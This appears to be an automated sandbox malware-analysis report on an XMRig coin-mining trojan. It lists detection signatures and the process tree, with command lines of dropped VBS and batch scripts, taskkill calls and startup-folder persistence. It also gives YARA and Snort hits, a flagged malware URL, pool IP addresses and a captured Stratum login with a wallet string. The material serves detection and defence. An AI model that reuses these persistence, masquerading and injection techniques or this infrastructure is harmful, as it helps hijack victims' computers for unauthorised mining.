Edit tour

Windows Analysis Report
2rVBokoc2C

Overview

General Information

Sample Name:	2rVBokoc2C (renamed file extension from none to exe)
Analysis ID:	647899
MD5:	c37ffea9b9ba78c03a9296b73d3d55bd
SHA1:	bde857ecd190681eef6024acb3c82dcf9913b865
SHA256:	f924ddf42e5f1b8102e774b68fff7e40c217acee2f0fe1c44453766af97f419b
Tags:	32CoinMinerexetrojan
Infos:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (overwrites its own PE header)

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Antivirus detection for dropped file

Sigma detected: Drops script at startup location

Snort IDS alert for network traffic

Multi AV Scanner detection for submitted file

Yara detected Xmrig cryptocurrency miner

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for dropped file

Drops PE files to the startup folder

Found strings related to Crypto-Mining

Query firmware table information (likely to detect VMs)

Sample is not signed and drops a device driver

Detected Stratum mining protocol

Allocates memory in foreign processes

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Drops PE files with benign system names

Sample uses process hollowing technique

Writes to foreign memory regions

.NET source code contains very large strings

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

Antivirus or Machine Learning detection for unpacked file

Drops PE files to the application program directory (C:\ProgramData)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Contains long sleeps (>= 3 min)

Drops files with a non-matching file extension (content does not match file extension)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Creates driver files

Creates a start menu entry (Start Menu\Programs\Startup)

PE file contains more sections than normal

Dropped file seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Deletes files inside the Windows folder

Creates files inside the system directory

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to communicate with device drivers

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Enables debug privileges

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

File is packed with WinRar

Detected TCP or UDP traffic on non-standard ports

Creates a window with clipboard capturing capabilities

Uses taskkill to terminate processes

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries disk information (often used to detect virtual machines)

Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

System is w10x64

2rVBokoc2C.exe (PID: 7056 cmdline: "C:\Users\user\Desktop\2rVBokoc2C.exe" MD5: C37FFEA9B9BA78C03A9296B73D3D55BD)

wscript.exe (PID: 6332 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\install.vbs" MD5: 7075DD7B9BE8807FCA93ACD86F724884)

cmd.exe (PID: 6404 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\01Atodo\del.bat" " MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

taskkill.exe (PID: 4944 cmdline: TASKKILL /IM wscript.exe /F MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

taskkill.exe (PID: 3064 cmdline: TASKKILL /IM wscript.exe /F MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

taskkill.exe (PID: 6220 cmdline: TASKKILL /IM wscript.exe /F MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

notepad.exe (PID: 6760 cmdline: C:\Windows\notepad.exe" -c "C:\ProgramData\eWTBqYYAek\cfg MD5: BB9A06B8F2DD9D24C77F389D7B2B58D2)

taskkill.exe (PID: 5056 cmdline: TASKKILL /IM wscript.exe /F MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

timeout.exe (PID: 6500 cmdline: timeout /t 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

wscript.exe (PID: 6616 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\delreg.vbs" MD5: 7075DD7B9BE8807FCA93ACD86F724884)

timeout.exe (PID: 6628 cmdline: timeout /t 2 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

wscript.exe (PID: 6308 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\killroaming.vbs" MD5: 7075DD7B9BE8807FCA93ACD86F724884)

wscript.exe (PID: 6388 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\killstatrup.vbs" MD5: 7075DD7B9BE8807FCA93ACD86F724884)

wscript.exe (PID: 5100 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\deltemp.vbs" MD5: 7075DD7B9BE8807FCA93ACD86F724884)

wscript.exe (PID: 7104 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\start.vbs" MD5: 7075DD7B9BE8807FCA93ACD86F724884)

cmd.exe (PID: 6564 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\01Atodo\start.bat" " MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

wininit.exe (PID: 6084 cmdline: wininit.exe MD5: 606CE310D75EE688CBFFAEAE33AB4FEE)

services.exe (PID: 6588 cmdline: services.exe MD5: 0C8E76FF6BA1CC33C2A37928A1E9642B)

cvtres.exe (PID: 6584 cmdline: \Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe MD5: EC0A2E5708E3FC63D01C6ABFE522C1D9)

AudioClip.exe (PID: 6192 cmdline: AudioClip.exe MD5: 1F22C6DBDF4806A6ADB969CB6E548400)

timeout.exe (PID: 5980 cmdline: timeout /t 2 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

wscript.exe (PID: 6844 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\Replace32640.vbs" MD5: 7075DD7B9BE8807FCA93ACD86F724884)

wscript.exe (PID: 6300 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\mavis9080.vbe" MD5: 7075DD7B9BE8807FCA93ACD86F724884)

services.exe (PID: 6556 cmdline: "C:\Users\user\AppData\Roaming\01Atodo\services.exe" MD5: 0C8E76FF6BA1CC33C2A37928A1E9642B)

cvtres.exe (PID: 6220 cmdline: \Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe MD5: EC0A2E5708E3FC63D01C6ABFE522C1D9)

wscript.exe (PID: 5944 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\start.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

cmd.exe (PID: 7160 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\01Atodo\start.bat" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 3944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

wininit.exe (PID: 7088 cmdline: wininit.exe MD5: 606CE310D75EE688CBFFAEAE33AB4FEE)

svchost.exe (PID: 6928 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 588 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)

AudioClip.exe (PID: 4772 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe" MD5: 1F22C6DBDF4806A6ADB969CB6E548400)

cleanup

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1ed36b:$sa1: stratum+tcp://

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\01Atodo\config.json	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20	Detects XMRIG crypto coin miners	Florian Roth	0x52e18c:$x1: xmrig.exe 0x52e078:$x2: xmrig.com 0x52e150:$x2: xmrig.com
C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4bc6e8:$x1: donate.ssl.xmrig.com 0x4bcbf1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4bd200:$s1: %s/%s (Windows NT %lu.%lu 0x4be240:$s3: \\.\WinRing0_ 0x4b4648:$s4: pool_wallet 0x4afbd8:$s5: cryptonight 0x4afbe8:$s5: cryptonight 0x4afbf8:$s5: cryptonight 0x4afc08:$s5: cryptonight 0x4afc20:$s5: cryptonight 0x4afc30:$s5: cryptonight 0x4afc40:$s5: cryptonight 0x4afc58:$s5: cryptonight 0x4afc68:$s5: cryptonight 0x4afc80:$s5: cryptonight 0x4afc98:$s5: cryptonight 0x4afca8:$s5: cryptonight 0x4afcb8:$s5: cryptonight 0x4afcc8:$s5: cryptonight 0x4afce0:$s5: cryptonight 0x4afcf8:$s5: cryptonight 0x4afd08:$s5: cryptonight 0x4afd18:$s5: cryptonight

Memory Dumps

Source	Rule	Description	Author	Strings
0000001E.00000000.546097148.00007FF690D0D000.00000002.00000001.01000000.00000010.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000000.00000003.430189255.0000000006A40000.00000004.00000800.00020000.00000000.sdmp	PUA_Crypto_Mining_CommandLine_Indicators_Oct21	Detects command line parameters often used by crypto mining software	Florian Roth	0x42d95:$s01: --cpu-priority= 0x426ed:$s05: --nicehash
00000000.00000003.430189255.0000000006A40000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000000.00000003.429825827.000000000697A000.00000004.00000800.00020000.00000000.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x698c8:$sa1: stratum+tcp://
00000000.00000003.429825827.000000000697A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000021.00000002.750831813.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000000.00000003.430505540.0000000006AF0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000000.548103464.00007FF6908C4000.00000002.00000001.01000000.00000010.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x90aa8:$sa1: stratum+tcp://
00000024.00000000.548103464.00007FF6908C4000.00000002.00000001.01000000.00000010.sdmp	PUA_Crypto_Mining_CommandLine_Indicators_Oct21	Detects command line parameters often used by crypto mining software	Florian Roth	0x12ff75:$s01: --cpu-priority= 0x12f8cd:$s05: --nicehash
00000024.00000000.548103464.00007FF6908C4000.00000002.00000001.01000000.00000010.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000001E.00000000.540071330.00007FF6908C4000.00000002.00000001.01000000.00000010.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x90aa8:$sa1: stratum+tcp://
0000001E.00000000.540071330.00007FF6908C4000.00000002.00000001.01000000.00000010.sdmp	PUA_Crypto_Mining_CommandLine_Indicators_Oct21	Detects command line parameters often used by crypto mining software	Florian Roth	0x12ff75:$s01: --cpu-priority= 0x12f8cd:$s05: --nicehash
0000001E.00000000.540071330.00007FF6908C4000.00000002.00000001.01000000.00000010.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000002.755329501.000002A4FF769000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000001C.00000002.753918438.0000027C1CA3C000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000000.550535309.00007FF690D0D000.00000002.00000001.01000000.00000010.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000001E.00000003.549600394.000001DF76002000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: 2rVBokoc2C.exe PID: 7056	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x58ff3:$sa1: stratum+tcp:// 0x5904b:$sa1: stratum+tcp://
Process Memory Space: 2rVBokoc2C.exe PID: 7056	PUA_Crypto_Mining_CommandLine_Indicators_Oct21	Detects command line parameters often used by crypto mining software	Florian Roth	0xa89a:$s01: --cpu-priority= 0xa29b:$s05: --nicehash
Process Memory Space: 2rVBokoc2C.exe PID: 7056	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: conhost.exe PID: 3944	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: wininit.exe PID: 7088	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x56e98:$sa1: stratum+tcp:// 0x56ef0:$sa1: stratum+tcp://
Process Memory Space: wininit.exe PID: 7088	PUA_Crypto_Mining_CommandLine_Indicators_Oct21	Detects command line parameters often used by crypto mining software	Florian Roth	0x86668:$s01: --cpu-priority= 0x86069:$s05: --nicehash
Process Memory Space: wininit.exe PID: 7088	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: conhost.exe PID: 6316	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: wininit.exe PID: 6084	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x60467:$sa1: stratum+tcp:// 0x604bf:$sa1: stratum+tcp://
Process Memory Space: wininit.exe PID: 6084	PUA_Crypto_Mining_CommandLine_Indicators_Oct21	Detects command line parameters often used by crypto mining software	Florian Roth	0x8fc37:$s01: --cpu-priority= 0x8f638:$s05: --nicehash
Process Memory Space: wininit.exe PID: 6084	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: cvtres.exe PID: 6584	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0x4119:$file: URL= 0x4200:$file: URL= 0x40f9:$url_explicit: [InternetShortcut] 0x41ec:$url_explicit: [InternetShortcut]
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
33.2.cvtres.exe.400000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
33.2.cvtres.exe.400000.0.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.0.wininit.exe.7ff690540000.0.unpack	PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20	Detects XMRIG crypto coin miners	Florian Roth	0x52e18c:$x1: xmrig.exe 0x52e078:$x2: xmrig.com 0x52e150:$x2: xmrig.com
36.0.wininit.exe.7ff690540000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4bc6e8:$x1: donate.ssl.xmrig.com 0x4bcbf1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
36.0.wininit.exe.7ff690540000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.0.wininit.exe.7ff690540000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4bd200:$s1: %s/%s (Windows NT %lu.%lu 0x4be240:$s3: \\.\WinRing0_ 0x4b4648:$s4: pool_wallet 0x4afbd8:$s5: cryptonight 0x4afbe8:$s5: cryptonight 0x4afbf8:$s5: cryptonight 0x4afc08:$s5: cryptonight 0x4afc20:$s5: cryptonight 0x4afc30:$s5: cryptonight 0x4afc40:$s5: cryptonight 0x4afc58:$s5: cryptonight 0x4afc68:$s5: cryptonight 0x4afc80:$s5: cryptonight 0x4afc98:$s5: cryptonight 0x4afca8:$s5: cryptonight 0x4afcb8:$s5: cryptonight 0x4afcc8:$s5: cryptonight 0x4afce0:$s5: cryptonight 0x4afcf8:$s5: cryptonight 0x4afd08:$s5: cryptonight 0x4afd18:$s5: cryptonight
30.0.wininit.exe.7ff690540000.0.unpack	PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20	Detects XMRIG crypto coin miners	Florian Roth	0x52e18c:$x1: xmrig.exe 0x52e078:$x2: xmrig.com 0x52e150:$x2: xmrig.com
30.0.wininit.exe.7ff690540000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4bc6e8:$x1: donate.ssl.xmrig.com 0x4bcbf1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
30.0.wininit.exe.7ff690540000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
30.0.wininit.exe.7ff690540000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4bd200:$s1: %s/%s (Windows NT %lu.%lu 0x4be240:$s3: \\.\WinRing0_ 0x4b4648:$s4: pool_wallet 0x4afbd8:$s5: cryptonight 0x4afbe8:$s5: cryptonight 0x4afbf8:$s5: cryptonight 0x4afc08:$s5: cryptonight 0x4afc20:$s5: cryptonight 0x4afc30:$s5: cryptonight 0x4afc40:$s5: cryptonight 0x4afc58:$s5: cryptonight 0x4afc68:$s5: cryptonight 0x4afc80:$s5: cryptonight 0x4afc98:$s5: cryptonight 0x4afca8:$s5: cryptonight 0x4afcb8:$s5: cryptonight 0x4afcc8:$s5: cryptonight 0x4afce0:$s5: cryptonight 0x4afcf8:$s5: cryptonight 0x4afd08:$s5: cryptonight 0x4afd18:$s5: cryptonight
Click to see the 5 entries

Sigma Signatures

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\2rVBokoc2C.exe, ProcessId: 7056, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.vbs.lnk

Snort Signatures

ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2020-11-20 2) - Source IP: 192.168.2.5 - Destination IP: 64.235.37.55

Timestamp:	192.168.2.564.235.37.554982433332845601 06/17/22-19:41:45.868458
SID:	2845601
Source Port:	49824
Destination Port:	3333
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8) - Source IP: 192.168.2.5 - Destination IP: 200.83.148.79

Timestamp:	192.168.2.5200.83.148.794982933332831812 06/17/22-19:41:57.703405
SID:	2831812
Source Port:	49829
Destination Port:	3333
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2020-11-20 2) - Source IP: 192.168.2.5 - Destination IP: 64.235.37.55

Timestamp:	192.168.2.564.235.37.554981833332845601 06/17/22-19:41:41.357862
SID:	2845601
Source Port:	49818
Destination Port:	3333
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8) - Source IP: 192.168.2.5 - Destination IP: 200.83.148.79

Timestamp:	192.168.2.5200.83.148.794984433332831812 06/17/22-19:42:50.277017
SID:	2831812
Source Port:	49844
Destination Port:	3333
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8) - Source IP: 192.168.2.5 - Destination IP: 64.235.37.55

Timestamp:	192.168.2.564.235.37.554981833332831812 06/17/22-19:41:41.357862
SID:	2831812
Source Port:	49818
Destination Port:	3333
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8) - Source IP: 192.168.2.5 - Destination IP: 64.235.37.55

Timestamp:	192.168.2.564.235.37.554982433332831812 06/17/22-19:41:45.868458
SID:	2831812
Source Port:	49824
Destination Port:	3333
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://web1705.ath.cx/log.phpM	Avira URL Cloud: Label: malware
Source: http://web1705.ath.cx/log.php	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Avira: detection malicious, Label: HEUR/AGEN.1202120
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	Avira: detection malicious, Label: HEUR/AGEN.1222458
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Avira: detection malicious, Label: HEUR/AGEN.1222458
Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	Avira: detection malicious, Label: HEUR/AGEN.1213073

Multi AV Scanner detection for submitted file

Source: 2rVBokoc2C.exe	Virustotal: Detection: 67%	Perma Link
Source: 2rVBokoc2C.exe	Metadefender: Detection: 28%	Perma Link
Source: 2rVBokoc2C.exe	ReversingLabs: Detection: 88%

Antivirus / Scanner detection for submitted sample

Source: 2rVBokoc2C.exe

Avira: detected

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Metadefender: Detection: 34%	Perma Link
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	ReversingLabs: Detection: 88%
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Metadefender: Detection: 22%	Perma Link
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	Metadefender: Detection: 34%	Perma Link
Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	Metadefender: Detection: 34%	Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	ReversingLabs: Detection: 88%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	Joe Sandbox ML: detected

Source: 33.0.cvtres.exe.400000.3.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 33.0.cvtres.exe.400000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 33.0.cvtres.exe.400000.1.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 33.0.cvtres.exe.400000.4.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 38.0.cvtres.exe.400000.5.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 38.0.cvtres.exe.400000.1.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 33.0.cvtres.exe.400000.5.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 38.0.cvtres.exe.400000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 38.2.cvtres.exe.400000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 33.2.cvtres.exe.400000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 38.0.cvtres.exe.400000.3.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 38.0.cvtres.exe.400000.2.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 38.0.cvtres.exe.400000.4.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 33.0.cvtres.exe.400000.2.unpack	Avira: Label: TR/ATRAPS.Gen

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: 33.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.0.wininit.exe.7ff690540000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.0.wininit.exe.7ff690540000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000000.546097148.00007FF690D0D000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.430189255.0000000006A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.429825827.000000000697A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.750831813.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.430505540.0000000006AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.548103464.00007FF6908C4000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.540071330.00007FF6908C4000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.755329501.000002A4FF769000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.753918438.0000027C1CA3C000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.550535309.00007FF690D0D000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.549600394.000001DF76002000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2rVBokoc2C.exe PID: 7056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: conhost.exe PID: 3944, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wininit.exe PID: 7088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: conhost.exe PID: 6316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wininit.exe PID: 6084, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\01Atodo\config.json, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe, type: DROPPED

Found strings related to Crypto-Mining

Source: 2rVBokoc2C.exe, 00000000.00000003.430189255.0000000006A40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stratum+ssl://randomx.xmrig.com:443
Source: 2rVBokoc2C.exe, 00000000.00000003.430189255.0000000006A40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cryptonight/0
Source: 2rVBokoc2C.exe, 00000000.00000003.430189255.0000000006A40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: 2rVBokoc2C.exe, 00000000.00000003.429825827.000000000697A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: 2rVBokoc2C.exe, 00000000.00000003.430189255.0000000006A40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: 2rVBokoc2C.exe, 00000000.00000003.430189255.0000000006A40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: XMRig 6.17.0

Detected Stratum mining protocol

Source: global traffic	TCP traffic: 192.168.2.5:49818 -> 64.235.37.55:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"8aqxf1xtq3bbvaxy3ubmz2rmfaewvfjqsndqaukcq81zabivlj4xxavjnzflulvden21zttz1sjwfe555femgw7eaoni354","pass":"x","agent":"xmrig/6.17.0 (windows nt 10.0; win64; x64) libuv/1.43.0 msvc/2019","rigid":"xmrig","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt","astrobwt/v2","ghostrider"]}}.
